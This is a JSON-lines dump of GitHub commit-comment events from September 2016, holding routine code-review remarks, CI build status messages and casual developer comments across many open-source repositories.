{"id":"4568091344","type":"CommitCommentEvent","actor":{"login":"jimmypuckett"},"repo":{"name":"spinen/simple-php-web-tester"},"payload":{"comment":{"id":19036256,"position":null,"line":null,"path":null,"commit_id":"20383cdb4a3ef46027cc61a833cb161e7c18dbab","created_at":"2016-09-15T13:30:51Z","updated_at":"2016-09-15T13:30:51Z","body":"Thanks @ssfinney "}},"created_at":"2016-09-15T13:30:51Z"}
{"id":"4568097770","type":"CommitCommentEvent","actor":{"login":"patham9"},"repo":{"name":"patham9/narjure"},"payload":{"comment":{"id":19036293,"position":null,"line":null,"path":null,"commit_id":"f948f71016adfb53fcc67ab0dbd9c018389c5a4a","created_at":"2016-09-15T13:31:59Z","updated_at":"2016-09-15T13:31:59Z","body":"wrong commit comment.\r\nExample adjustment, operation choice improvement, and budget function adjustment."}},"created_at":"2016-09-15T13:31:59Z"}
{"id":"4568100634","type":"CommitCommentEvent","actor":{"login":"surajrav"},"repo":{"name":"freenas/freenas"},"payload":{"comment":{"id":19036300,"position":null,"line":null,"path":null,"commit_id":"977d14df48bd85ee3d84b5a3ba1c8d396c99c025","created_at":"2016-09-15T13:32:30Z","updated_at":"2016-09-15T13:32:30Z","body":"@jceel how does this look?"}},"created_at":"2016-09-15T13:32:30Z"}
{"id":"4568103346","type":"CommitCommentEvent","actor":{"login":"nfeske"},"repo":{"name":"ehmry/genode"},"payload":{"comment":{"id":19036307,"position":12,"line":68,"path":"repos/os/include/input_session/client.h","commit_id":"f0eb07a7f0dbbe1b66517cbc4d8acfbcca8ef4e3","created_at":"2016-09-15T13:32:59Z","updated_at":"2016-09-15T13:32:59Z","body":"The size_t comment also applies to `n`. With the current version, you could actually make `n` const.\r\n\r\nThe error message will never be displayed. Because of the `min`, the condition can never be true. If one wants to obtain the count of events, a counter could be incremented in the lambda at the client.\r\n\r\nBtw, have you found a use of the return value while adapting the clients? If not, how about removing it?"}},"created_at":"2016-09-15T13:32:59Z"}
{"id":"4568104017","type":"CommitCommentEvent","actor":{"login":"bigretromike"},"repo":{"name":"bigretromike/nakamori"},"payload":{"comment":{"id":19036314,"position":null,"line":null,"path":null,"commit_id":"77b697e9b0ab2fbc00e1985e77e3e5c3fabfaed7","created_at":"2016-09-15T13:33:06Z","updated_at":"2016-09-15T13:33:06Z","body":"Probably thats good for now as i took it out from 2.1.0 ;-) and put here so it would be easier to merge both "}},"created_at":"2016-09-15T13:33:06Z"}
{"id":"4568105524","type":"CommitCommentEvent","actor":{"login":"GantMan"},"repo":{"name":"facebook/react-native"},"payload":{"comment":{"id":19036317,"position":null,"line":null,"path":null,"commit_id":"db870f87295aec490a0bba92665436c871582056","created_at":"2016-09-15T13:33:20Z","updated_at":"2016-09-15T13:33:20Z","body":"Special thanks to the FB team who helped get this PR through internals.  @grabbou  et al."}},"created_at":"2016-09-15T13:33:20Z"}
{"id":"4568109628","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19036329,"position":null,"line":null,"path":null,"commit_id":"3b475b44bdbc4a96278abcd9d85209bd33c58865","created_at":"2016-09-15T13:34:05Z","updated_at":"2016-09-15T13:34:05Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1012](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13357&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-15T13:34:05Z"}
{"id":"4568110014","type":"CommitCommentEvent","actor":{"login":"lucabrivio"},"repo":{"name":"jcalovski/Stockfish"},"payload":{"comment":{"id":19036332,"position":null,"line":null,"path":null,"commit_id":"0f5fd2add8c0d5ceec7689b7ecb2015fb2b92345","created_at":"2016-09-15T13:34:11Z","updated_at":"2016-09-15T13:34:11Z","body":"Nice attempt. In my opinion the minimum number of supported pawns for one side between the two (≥ 5?) is a better criterium than pawn asymmetry, in fact in pawn locks there are often two or more asymmetries..."}},"created_at":"2016-09-15T13:34:11Z"}
{"id":"4568110679","type":"CommitCommentEvent","actor":{"login":"kd0aij"},"repo":{"name":"PX4/DriverFramework"},"payload":{"comment":{"id":19036335,"position":null,"line":null,"path":null,"commit_id":"6bdc8bce97c619a77276d183f88ee2d6efce4cbf","created_at":"2016-09-15T13:34:18Z","updated_at":"2016-09-15T13:34:18Z","body":"This is what I was looking at in the datasheet:\r\n![lsm9ds1](https://cloud.githubusercontent.com/assets/2300221/18551635/82d238ee-7b16-11e6-93dc-6209d0c42ef8.png)\r\n\r\nI haven't looked at the code, mainly because I have no idea what hardware this is used in, and figured it was closed source.\r\n"}},"created_at":"2016-09-15T13:34:18Z"}
{"id":"4568110681","type":"CommitCommentEvent","actor":{"login":"ForbesLindesay"},"repo":{"name":"sstur/react-rte"},"payload":{"comment":{"id":19036336,"position":56,"line":56,"path":"src/SimpleRichTextEditor.js","commit_id":"06ed718a463e6b8ddc0fb88fd868727c475a0daf","created_at":"2016-09-15T13:34:18Z","updated_at":"2016-09-15T13:34:18Z","body":"Doesn't this method also need to call `this.setState({editorValue});` before passing on the change?  otherwise changes to things like cursor position won't be tracked."}},"created_at":"2016-09-15T13:34:18Z"}
{"id":"4568111033","type":"CommitCommentEvent","actor":{"login":"vskh"},"repo":{"name":"webdriverio/webdrivercss"},"payload":{"comment":{"id":19036339,"position":28,"line":56,"path":"package.json","commit_id":"cc4c99410025bc0aab9810dbdc1ab2314881c37f","created_at":"2016-09-15T13:34:21Z","updated_at":"2016-09-15T13:34:21Z","body":"Thank you very much! Spent a day debugging and googling but did not find this. Now it has started working."}},"created_at":"2016-09-15T13:34:21Z"}
{"id":"4568112041","type":"CommitCommentEvent","actor":{"login":"bluca"},"repo":{"name":"zeromq/libzmq"},"payload":{"comment":{"id":19036344,"position":null,"line":null,"path":null,"commit_id":"acb68070415691413ade304c2a75beeb69106909","created_at":"2016-09-15T13:34:31Z","updated_at":"2016-09-15T13:34:31Z","body":"Commenting on a commit is not the best way to report a problem. Please open an issue and describe exactly what you are doing, what does \"not working\" mean, and what environment and version you are using."}},"created_at":"2016-09-15T13:34:31Z"}
{"id":"4568113498","type":"CommitCommentEvent","actor":{"login":"Rocky640"},"repo":{"name":"atumanian/Stockfish"},"payload":{"comment":{"id":19036348,"position":null,"line":null,"path":null,"commit_id":"5df62e5d9286c38f486ea89fbc8d2d9b51445dd9","created_at":"2016-09-15T13:34:46Z","updated_at":"2016-09-15T13:34:46Z","body":"There was an error when you submitted the test\r\n\"base signature\" should be 5341477 (not 6883133 !)\r\n\r\nFor reference, this was tested 4-5 years ago\r\nhttp://tests.stockfishchess.org/tests/view/5184e1ea8f0c3e3b44cdad32\r\nBut at that time, they were using a different opening book, \r\nand different SPRT bounds.\r\n\r\n"}},"created_at":"2016-09-15T13:34:46Z"}
{"id":"4568113981","type":"CommitCommentEvent","actor":{"login":"ForbesLindesay"},"repo":{"name":"sstur/react-rte"},"payload":{"comment":{"id":19036351,"position":60,"line":60,"path":"src/SimpleRichTextEditor.js","commit_id":"06ed718a463e6b8ddc0fb88fd868727c475a0daf","created_at":"2016-09-15T13:34:50Z","updated_at":"2016-09-15T13:34:50Z","body":"Shouldn't we check that the `stringValue` does not equal `this.props.value` before calling `onChange` here."}},"created_at":"2016-09-15T13:34:50Z"}
{"id":"4568116196","type":"CommitCommentEvent","actor":{"login":"mathieu-benoit"},"repo":{"name":"Microsoft/vsts-tasks"},"payload":{"comment":{"id":19036353,"position":115,"line":195,"path":"Tasks/SqlAzureDacpacDeployment/Utility.ps1","commit_id":"4cefaf18b6753d0408be6d97715ae86e404e6822","created_at":"2016-09-15T13:35:14Z","updated_at":"2016-09-15T13:35:14Z","body":"Hi @rohit-batra I'm using this VSTS DacpacTask to publish a DACPAC file (currently deployed in version 1.0.26) and I have errors not very detailed:\r\n`2016-09-15T13:08:44.5739806Z ##[debug]Executing SQLPackage.exe\r\n2016-09-15T13:08:44.5769808Z ##[debug]Executing : \"C:\\Program Files (x86)\\Microsoft Visual Studio 14.0\\Common7\\IDE\\Extensions\\Microsoft\\SQLDB\\DAC\\130\\SqlPackage.exe\" /Action:Publish ...\r\n2016-09-15T13:08:45.3359399Z Publishing to database 'TODO_Sitecore_Web' on server 'sitecore-db.database.windows.net'.\r\n2016-09-15T13:08:46.5591346Z Initializing deployment (Start)\r\n2016-09-15T13:08:50.1834544Z Initializing deployment (Failed)\r\n2016-09-15T13:08:50.2064540Z ##[debug]System.Management.Automation.RemoteException: *** An error occurred during deployment plan generation. Deployment cannot continue.\r\n2016-09-15T13:08:50.2224541Z ##[debug]Caught exception from task script.\r\n2016-09-15T13:08:50.2274560Z ##[debug]Error record:\r\n2016-09-15T13:08:50.2964549Z ##[debug]*** An error occurred during deployment plan generation. Deployment cannot continue.\r\n2016-09-15T13:08:50.2984551Z ##[debug]At C:\\a\\_tasks\\SqlAzureDacpacDeployment_ce85a08b-a538-4d2b-8589-1d37a9ab970f\\1.0.26\\Utility.ps1:253 char:9\r\n2016-09-15T13:08:50.2994555Z ##[debug]+         throw $_.Exception\r\n2016-09-15T13:08:50.3184555Z ##[debug]+         ~~~~~~~~~~~~~~~~~~\r\n2016-09-15T13:08:50.3204547Z ##[debug]    + CategoryInfo          : NotSpecified: (:) [], RemoteException\r\n2016-09-15T13:08:50.3214616Z ##[debug]    + FullyQualifiedErrorId : RuntimeException\r\n2016-09-15T13:08:50.3264616Z ##[debug]Script stack trace:\r\n2016-09-15T13:08:50.3324557Z ##[debug]at Run-Command, C:\\a\\_tasks\\SqlAzureDacpacDeployment_ce85a08b-a538-4d2b-8589-1d37a9ab970f\\1.0.26\\Utility.ps1: line 253\r\n2016-09-15T13:08:50.3344546Z ##[debug]at <ScriptBlock>, C:\\a\\_tasks\\SqlAzureDacpacDeployment_ce85a08b-a538-4d2b-8589-1d37a9ab970f\\1.0.26\\DeploySqlAzure.ps1: line 138`\r\n\r\nIt's talking about line:253 which doesn't exist anymore with the current version in GitHub. I was wondering because you are working on a new version 1.0.27 if you have some idea around this and for example if you know when will be published/available the 1.0.27 version?\r\n\r\nThank you for your feedback,\r\nMathieu."}},"created_at":"2016-09-15T13:35:14Z"}
{"id":"4568117663","type":"CommitCommentEvent","actor":{"login":"PlusMinus0"},"repo":{"name":"rhabbachi/displaylink-pkgbuild"},"payload":{"comment":{"id":19036356,"position":10,"line":14,"path":"PKGBUILD","commit_id":"8d8143696c6af4421e0800c91a67eb777bcc7d98","created_at":"2016-09-15T13:35:29Z","updated_at":"2016-09-15T13:35:29Z","body":"Nevermind, i confused displaylink and evdi."}},"created_at":"2016-09-15T13:35:29Z"}
{"id":"4568120276","type":"CommitCommentEvent","actor":{"login":"chelmuth"},"repo":{"name":"ehmry/genode"},"payload":{"comment":{"id":19036360,"position":12,"line":68,"path":"repos/os/include/input_session/client.h","commit_id":"f0eb07a7f0dbbe1b66517cbc4d8acfbcca8ef4e3","created_at":"2016-09-15T13:35:55Z","updated_at":"2016-09-15T13:35:55Z","body":"I'd also remove the diagnostic message."}},"created_at":"2016-09-15T13:35:55Z"}
{"id":"4568122143","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19036364,"position":null,"line":null,"path":null,"commit_id":"3d18adaa5fc069fa3808e2721651578a799848b6","created_at":"2016-09-15T13:36:17Z","updated_at":"2016-09-15T13:36:17Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1011](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13354&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 239, ignored: 3 Build time: 00:10:15"}},"created_at":"2016-09-15T13:36:17Z"}
{"id":"4568123005","type":"CommitCommentEvent","actor":{"login":"luqmanarifin"},"repo":{"name":"luqmanarifin/tutorial-github"},"payload":{"comment":{"id":19036367,"position":null,"line":null,"path":null,"commit_id":"f914e34699bb88c78b4a0ad0e79366a880ebd628","created_at":"2016-09-15T13:36:26Z","updated_at":"2016-09-15T13:36:26Z","body":"halo"}},"created_at":"2016-09-15T13:36:26Z"}
{"id":"4568128283","type":"CommitCommentEvent","actor":{"login":"rhabbachi"},"repo":{"name":"rhabbachi/displaylink-pkgbuild"},"payload":{"comment":{"id":19036388,"position":10,"line":14,"path":"PKGBUILD","commit_id":"8d8143696c6af4421e0800c91a67eb777bcc7d98","created_at":"2016-09-15T13:37:21Z","updated_at":"2016-09-15T13:37:21Z","body":"No problem @PlusMinus0."}},"created_at":"2016-09-15T13:37:21Z"}
{"id":"4568129806","type":"CommitCommentEvent","actor":{"login":"zaps166"},"repo":{"name":"reagentoo/gentoo-overlay"},"payload":{"comment":{"id":19036392,"position":null,"line":null,"path":null,"commit_id":"7c26fe65704af197d6ff984683933ead243dccb6","created_at":"2016-09-15T13:37:37Z","updated_at":"2016-09-15T13:37:37Z","body":"Hmm, just ignore it - this is for Ubuntu Unity integration (see: https://www.maketecheasier.com/8-really-useful-ubuntu-unity-quicklists)."}},"created_at":"2016-09-15T13:37:37Z"}
{"id":"4568130188","type":"CommitCommentEvent","actor":{"login":"mmzoo"},"repo":{"name":"reactotron/reactotron"},"payload":{"comment":{"id":19036396,"position":57,"line":57,"path":"packages/reactotron-apisauce/package.json","commit_id":"97d86c73835b041deca77730b05d06d7aee78b14","created_at":"2016-09-15T13:37:41Z","updated_at":"2016-09-15T13:37:41Z","body":"Sure!\r\n\r\nBut for some reason, when running `npm i` several times, it goes through with this packages.json:\r\n\r\n```json\r\n...\r\n  \"dependencies\": {\r\n    \"apisauce\": \"^0.3.0\",\r\n    \"axios\": \"^0.13.1\",\r\n    \"ramda\": \"^0.22.1\",\r\n  ...\r\n  },\r\n  \"devDependencies\": {\r\n    \"reactotron-apisauce\": \"^1.1.2\",\r\n    \"reactotron-react-native\": \"^1.1.2\",\r\n    \"reactotron-redux\": \"^1.1.2\",\r\n  },\r\n...\r\n```\r\n\r\nIt really should not according to my thinking. But then again, I'm new to npm..."}},"created_at":"2016-09-15T13:37:41Z"}
{"id":"4568131236","type":"CommitCommentEvent","actor":{"login":"ajaybhatt003"},"repo":{"name":"lixin9311/stm32_pos_usb"},"payload":{"comment":{"id":19036398,"position":null,"line":null,"path":null,"commit_id":"9a754fd7700a2a6f8308a3aa3253a2ae75be07c1","created_at":"2016-09-15T13:37:52Z","updated_at":"2016-09-15T13:37:52Z","body":"Hello @lixin9311, I admire your work.I am working on a project which requires me to interface DW1000 with pixhawk(it contains 32bit ARM cortex M4 board),so I think you can help for that.\r\nI want to get range data from DW1000(interfaced with pixhawk) with respect to other four DW1000\r\nOther 4 DW1000 I have interfaced with arduino"}},"created_at":"2016-09-15T13:37:52Z"}
{"id":"4568131374","type":"CommitCommentEvent","actor":{"login":"juliotoscano"},"repo":{"name":"amadeusproject/uxdesign-html"},"payload":{"comment":{"id":19036399,"position":null,"line":null,"path":null,"commit_id":"e5e90bb3dceb47ff5603d2a228f5dec08730dbc4","created_at":"2016-09-15T13:37:53Z","updated_at":"2016-09-15T13:37:53Z","body":"#43 "}},"created_at":"2016-09-15T13:37:53Z"}
{"id":"4568136156","type":"CommitCommentEvent","actor":{"login":"hoomag"},"repo":{"name":"hoomag/DBS_Analysis"},"payload":{"comment":{"id":19036408,"position":null,"line":null,"path":null,"commit_id":"d7f966e04cc5463cbb1e0e0b824e986391f86f23","created_at":"2016-09-15T13:38:43Z","updated_at":"2016-09-15T13:38:43Z","body":"Some new script  in findHetroZygousBasesInTarget function for Base calling and Phred quality."}},"created_at":"2016-09-15T13:38:43Z"}
{"id":"4568137036","type":"CommitCommentEvent","actor":{"login":"ianjvb"},"repo":{"name":"svanburen/dotfiles"},"payload":{"comment":{"id":19036413,"position":null,"line":null,"path":null,"commit_id":"6fb676ad7330fc22137777783f53b398910225de","created_at":"2016-09-15T13:38:51Z","updated_at":"2016-09-15T13:38:51Z","body":"Wat is dis"}},"created_at":"2016-09-15T13:38:51Z"}
{"id":"4568142568","type":"CommitCommentEvent","actor":{"login":"PlusMinus0"},"repo":{"name":"rhabbachi/displaylink-pkgbuild"},"payload":{"comment":{"id":19036426,"position":3,"line":5,"path":"PKGBUILD","commit_id":"8d8143696c6af4421e0800c91a67eb777bcc7d98","created_at":"2016-09-15T13:39:46Z","updated_at":"2016-09-15T13:39:46Z","body":"This needs to be updated to 3."}},"created_at":"2016-09-15T13:39:46Z"}
{"id":"4568150418","type":"CommitCommentEvent","actor":{"login":"i-am-tom"},"repo":{"name":"wethersherbs/pineapple"},"payload":{"comment":{"id":19036442,"position":null,"line":null,"path":null,"commit_id":"4a89a74ede311c9e09bc5444d05d995beaa4ac73","created_at":"2016-09-15T13:41:06Z","updated_at":"2016-09-15T13:41:06Z","body":"I fully support everything about this change."}},"created_at":"2016-09-15T13:41:06Z"}
{"id":"4568150503","type":"CommitCommentEvent","actor":{"login":"rbengit2311"},"repo":{"name":"rbengit2311/gittraining"},"payload":{"comment":{"id":19036443,"position":null,"line":null,"path":null,"commit_id":"461dd4fced268efe7e21b927aa39362e83feebd9","created_at":"2016-09-15T13:41:08Z","updated_at":"2016-09-15T13:41:08Z","body":"Looks good"}},"created_at":"2016-09-15T13:41:08Z"}
{"id":"4568154043","type":"CommitCommentEvent","actor":{"login":"anglofox"},"repo":{"name":"anglofox/docs"},"payload":{"comment":{"id":19036456,"position":null,"line":null,"path":null,"commit_id":"ce3aa722c583cde48812f0a596b95a5efd611441","created_at":"2016-09-15T13:41:43Z","updated_at":"2016-09-15T13:41:43Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;0jpjeg9L&#x2F;569-documentation-scrift-process\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Documentation: Scrift Process</a>"}},"created_at":"2016-09-15T13:41:43Z"}
{"id":"4568154680","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19036458,"position":null,"line":null,"path":null,"commit_id":"53b8d5a28a0e63c1c0cf23a924bc96a0e577a0d0","created_at":"2016-09-15T13:41:49Z","updated_at":"2016-09-15T13:41:49Z","body":"113836013-Swimming-Pool-Evaporation-and-Cover-Issues (RKStrand) - i386-Windows-7-VisualStudio-12: OK (2335 of 2336 tests passed, 0 test warnings)\n\n * 1 test had: AUD diffs.\n * 1 test had: EIO diffs.\n * 1 test had: ESO big diffs.\n * 1 test had: MTD diffs.\n * 1 test had: MTR big diffs.\n * 1 test had: RDD diffs.\n * 1 test had: Table big diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-53b8d5a28a0e63c1c0cf23a924bc96a0e577a0d0-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-53b8d5a28a0e63c1c0cf23a924bc96a0e577a0d0-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.96%25-yellow.svg)</a> \n"}},"created_at":"2016-09-15T13:41:49Z"}
{"id":"4568156824","type":"CommitCommentEvent","actor":{"login":"petro-rudenko"},"repo":{"name":"dmlc/xgboost"},"payload":{"comment":{"id":19036465,"position":27,"line":36,"path":"jvm-packages/xgboost4j-spark/src/main/scala/ml/dmlc/xgboost4j/scala/spark/XGBoostModel.scala","commit_id":"fb02797e2ac3ea41f52facb3469926575c4d63cb","created_at":"2016-09-15T13:42:12Z","updated_at":"2016-09-15T13:42:12Z","body":"But it's possible to just override `override def transform(dataset: Dataset[_]): DataFrame` that basically do the same as your's but  just append additional probability column. They did this ugly `predictRaw` just to [avoid repeated computation.] (https://github.com/apache/spark/blob/master/mllib/src/main/scala/org/apache/spark/ml/classification/ProbabilisticClassifier.scala#L112)"}},"created_at":"2016-09-15T13:42:12Z"}
{"id":"4568157357","type":"CommitCommentEvent","actor":{"login":"PrestaEdit"},"repo":{"name":"PrestaShop/prestashop.github.io"},"payload":{"comment":{"id":19036466,"position":null,"line":null,"path":null,"commit_id":"0e63db42b96155ed3a3f9f2808c86c357da7abdf","created_at":"2016-09-15T13:42:17Z","updated_at":"2016-09-15T13:42:17Z","body":"I know what you did last summer. I see that. :laughing: "}},"created_at":"2016-09-15T13:42:17Z"}
{"id":"4568158677","type":"CommitCommentEvent","actor":{"login":"bjfish"},"repo":{"name":"jruby/jruby"},"payload":{"comment":{"id":19036471,"position":33,"line":1205,"path":"truffle/src/main/java/org/jruby/truffle/core/numeric/FixnumNodes.java","commit_id":"a9b6515c8472b279bee2a085c09d185c49e656c6","created_at":"2016-09-15T13:42:29Z","updated_at":"2016-09-15T13:42:29Z","body":"I've fixed this at 7ddb76a5e96ccf677241bf605da7ee8ac403f9ed, thanks!"}},"created_at":"2016-09-15T13:42:29Z"}
{"id":"4568161023","type":"CommitCommentEvent","actor":{"login":"bjfish"},"repo":{"name":"jruby/jruby"},"payload":{"comment":{"id":19036475,"position":20,"line":903,"path":"truffle/src/main/java/org/jruby/truffle/core/kernel/KernelNodes.java","commit_id":"a9b6515c8472b279bee2a085c09d185c49e656c6","created_at":"2016-09-15T13:42:51Z","updated_at":"2016-09-15T13:42:51Z","body":"Yes, I think the seed should be first: 7ddb76a5e96ccf677241bf605da7ee8ac403f9ed"}},"created_at":"2016-09-15T13:42:51Z"}
{"id":"4568162953","type":"CommitCommentEvent","actor":{"login":"almuch"},"repo":{"name":"ernestomar/petstore"},"payload":{"comment":{"id":19036480,"position":null,"line":null,"path":null,"commit_id":"c0560ae8cdbf10a027fdc3995c461af689ee19ea","created_at":"2016-09-15T13:43:11Z","updated_at":"2016-09-15T13:43:11Z","body":"se me fue :v"}},"created_at":"2016-09-15T13:43:11Z"}
{"id":"4568165300","type":"CommitCommentEvent","actor":{"login":"olc-olivier"},"repo":{"name":"AngularClass/angular2-webpack-starter"},"payload":{"comment":{"id":19036486,"position":66,"line":159,"path":"config/webpack.common.js","commit_id":"dd1276b4989319a66e189ee78b87dc86a3a451a1","created_at":"2016-09-15T13:43:34Z","updated_at":"2016-09-15T13:43:34Z","body":"Mine. I have the same code.\r\n\r\n`{\r\n        test: /\\.scss$/,\r\n        exclude: /node_modules/,\r\n        loaders: ['raw-loader', 'sass-loader']\r\n      },`\r\n\r\nComponent\r\n\r\n`  selector: 'app',\r\n  encapsulation: ViewEncapsulation.None,\r\n  styleUrls: [\r\n    './app.style.scss'\r\n  ],\r\n  template:`"}},"created_at":"2016-09-15T13:43:34Z"}
{"id":"4568166032","type":"CommitCommentEvent","actor":{"login":"almuch"},"repo":{"name":"ernestomar/petstore"},"payload":{"comment":{"id":19036487,"position":null,"line":null,"path":null,"commit_id":"de6a14472dedc656167ca20d1e3049c8e311a4f2","created_at":"2016-09-15T13:43:41Z","updated_at":"2016-09-15T13:43:41Z","body":"hahaha"}},"created_at":"2016-09-15T13:43:41Z"}
{"id":"4568166300","type":"CommitCommentEvent","actor":{"login":"scottaohara"},"repo":{"name":"joshbuchea/HEAD"},"payload":{"comment":{"id":19036488,"position":29,"line":40,"path":"_layouts/default.html","commit_id":"4cd6e5ce9b80dd1b12afadcfbee5f046afeedca7","created_at":"2016-09-15T13:43:43Z","updated_at":"2016-09-15T13:43:43Z","body":"i don't necessarily see that as a bad thing.\r\n\r\npersonally I come from the mindset that if people want to have links open in a new tab, that's something they can do themselves.  i honestly don't like it when that is done automatically for me, since target=\"_blank\" auto changes tabs, when i may not actually be done with reading the page i was previously on.\r\n\r\nall that said, i vote it stays removed.  feel free to disagree with me though :)"}},"created_at":"2016-09-15T13:43:43Z"}
{"id":"4568170651","type":"CommitCommentEvent","actor":{"login":"salahatwa"},"repo":{"name":"salahatwa/GoEuro"},"payload":{"comment":{"id":19036499,"position":null,"line":null,"path":null,"commit_id":"c4c5e380d3c8d6e8bc47ded6e70bcbc679732afd","created_at":"2016-09-15T13:44:28Z","updated_at":"2016-09-15T13:44:28Z","body":"The endpoint always responds with a JSON array that contains JSON objects as elements. Each object, among other keys, has a name and a geo_position key. The geo_position key is an object with latitude and longitude fields. If no matches are found an empty JSON array is returned.\r\n\r\nThe program should query the API with the user input and create a CSV file from it. The CSV file should have the form: _id, name, type, latitude, longitude\r\n\r\n**# My solution**\r\n solution as a stand alone application which can be started from the command line, i.e. send us a fat jar file with all dependencies. You can use Java 8 and open source libraries that you think help you to fulfill this task. Also send us the source code to your solution. We use GitHub, so if you put your source code into a GitHub repository, it will make our life easier. We will evaluate your source code as well as the functionality of the program: Does it run, how does it handle errors, how well-engineered is the architecture etc. Thank you!"}},"created_at":"2016-09-15T13:44:28Z"}
{"id":"4568173887","type":"CommitCommentEvent","actor":{"login":"petro-rudenko"},"repo":{"name":"dmlc/xgboost"},"payload":{"comment":{"id":19036511,"position":83,"line":192,"path":"jvm-packages/xgboost4j-spark/src/main/scala/ml/dmlc/xgboost4j/scala/spark/XGBoostModel.scala","commit_id":"fb02797e2ac3ea41f52facb3469926575c4d63cb","created_at":"2016-09-15T13:45:01Z","updated_at":"2016-09-15T13:45:01Z","body":"Better to set default value `predictResultTrans: Option[Array[Float] => DataType] = None` to be able to use in pipeline. Since it calls just `transform(dataset)` it will fail"}},"created_at":"2016-09-15T13:45:01Z"}
{"id":"4568174132","type":"CommitCommentEvent","actor":{"login":"BeshoyTheBoy"},"repo":{"name":"BeshoyTheBoy/GitHubIntro"},"payload":{"comment":{"id":19036512,"position":null,"line":null,"path":null,"commit_id":"1fbb1777724277c18146be62208134d02aeb5a20","created_at":"2016-09-15T13:45:04Z","updated_at":"2016-09-15T13:45:04Z","body":"I finished yaaay!!!"}},"created_at":"2016-09-15T13:45:04Z"}
{"id":"4568176288","type":"CommitCommentEvent","actor":{"login":"mtandre"},"repo":{"name":"datahub/all-projects"},"payload":{"comment":{"id":19036517,"position":null,"line":null,"path":null,"commit_id":"675605a420b739780aa82ca8ca64da368f7646b0","created_at":"2016-09-15T13:45:27Z","updated_at":"2016-09-15T13:45:27Z","body":"On to the new templates! Woohoo."}},"created_at":"2016-09-15T13:45:27Z"}
{"id":"4568177681","type":"CommitCommentEvent","actor":{"login":"ChronoMonochrome"},"repo":{"name":"Meticulus/android_device_samsung_codinalte"},"payload":{"comment":{"id":19036520,"position":null,"line":null,"path":null,"commit_id":"7aaabe8577a61a2b0cd039670cd639c0a06373d3","created_at":"2016-09-15T13:45:41Z","updated_at":"2016-09-15T13:45:41Z","body":"> RIL: USED rild and libril from LP and it works perfect.\r\n\r\nYou  rock! :) I've tried it some months ago, but without any success at all :)\r\n\r\n> WE NEED TO BRING UP A 3.1 KERNEL ;)\r\n\r\nI've tried many times, but so far even using r3.1-rc1 kernel as the base ended up with the dead sleep issue. On the other hand, my kernel is some kind of a mix between 3.0 and 3.4: https://github.com/ChronoMonochrome/Chrono_Kernel-1/compare/2fcf5e1...master - so far this is the way I've found to implement some of the newest LK features without having non fully working kernel.\r\n\r\n> A2DP: This seems like a wake lock issue. If A2DP is in use then there should be a wake lock in effect. Perhaps a Sepolicy denial to /sys/kernel/wakelock ( <- something like that)\r\n\r\nHmm, but we aren't using Selinux since a long time ago... We have even worked out with some commits for init and vold binaries in order to disable it at all."}},"created_at":"2016-09-15T13:45:41Z"}
{"id":"4568179690","type":"CommitCommentEvent","actor":{"login":"CodingCat"},"repo":{"name":"dmlc/xgboost"},"payload":{"comment":{"id":19036522,"position":27,"line":36,"path":"jvm-packages/xgboost4j-spark/src/main/scala/ml/dmlc/xgboost4j/scala/spark/XGBoostModel.scala","commit_id":"fb02797e2ac3ea41f52facb3469926575c4d63cb","created_at":"2016-09-15T13:46:01Z","updated_at":"2016-09-15T13:46:01Z","body":"it still needs to call your implementation of predictRaw, https://github.com/apache/spark/blob/master/mllib/src/main/scala/org/apache/spark/ml/classification/ProbabilisticClassifier.scala#L117 no?"}},"created_at":"2016-09-15T13:46:01Z"}
{"id":"4568180124","type":"CommitCommentEvent","actor":{"login":"attuska"},"repo":{"name":"uhulinux/ub-ubk1"},"payload":{"comment":{"id":19036524,"position":null,"line":null,"path":null,"commit_id":"569d6202eb9e2d04ecaf2d13b3690571d12d2d19","created_at":"2016-09-15T13:46:07Z","updated_at":"2016-09-15T13:46:07Z","body":"Már vannak felhasználók és csoportok az eddig üres ablakban.\r\nEnnek ellenére még mindig nincs kiadott újabb verzió belőle."}},"created_at":"2016-09-15T13:46:07Z"}
{"id":"4568183652","type":"CommitCommentEvent","actor":{"login":"PlusMinus0"},"repo":{"name":"rhabbachi/displaylink-pkgbuild"},"payload":{"comment":{"id":19036529,"position":null,"line":null,"path":null,"commit_id":"8d8143696c6af4421e0800c91a67eb777bcc7d98","created_at":"2016-09-15T13:46:40Z","updated_at":"2016-09-15T13:46:40Z","body":"You should run mksrcinfo before you commit to update the .SRCINFO file. If you were to commit to the aur, it would break the build otherwise."}},"created_at":"2016-09-15T13:46:40Z"}
{"id":"4568187964","type":"CommitCommentEvent","actor":{"login":"domenkozar"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":19036539,"position":null,"line":null,"path":null,"commit_id":"98473cdb15d18e5f0b862a72ac7e629a433481fc","created_at":"2016-09-15T13:47:24Z","updated_at":"2016-09-15T13:47:24Z","body":"This issue is back? http://hydra.nixos.org/build/40671510/nixlog/2"}},"created_at":"2016-09-15T13:47:24Z"}
